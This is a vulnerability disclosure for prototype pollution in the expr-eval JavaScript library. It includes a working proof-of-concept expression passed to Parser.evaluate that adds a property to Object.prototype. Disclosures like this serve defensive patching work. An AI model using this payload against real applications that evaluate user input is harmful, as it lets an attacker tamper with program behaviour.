Prototype Pollution in silentmatt/expr-eval

Valid

Reported on

Mar 26th 2021


✍️ Description

With specific input, an attacker can define properties on the object prototype, which leads to prototype pollution.

Requires Node.js version >= 12.0.0, which introduced Object.fromEntries.

🕵️‍♂️ Proof of Concept

// PoC.js
const { Parser } = require('expr-eval');
const o = {};
console.log("o.a=", o.a); // o.a= undefined
const res = Parser.evaluate('Object=constructor;a=Object.fromEntries([["a","polluted"]]);Object.assign(__proto__, a)');
console.log("o.a=", o.a); // o.a= polluted

💥 Impact

This vulnerability allows an attacker to pollute the object prototype.
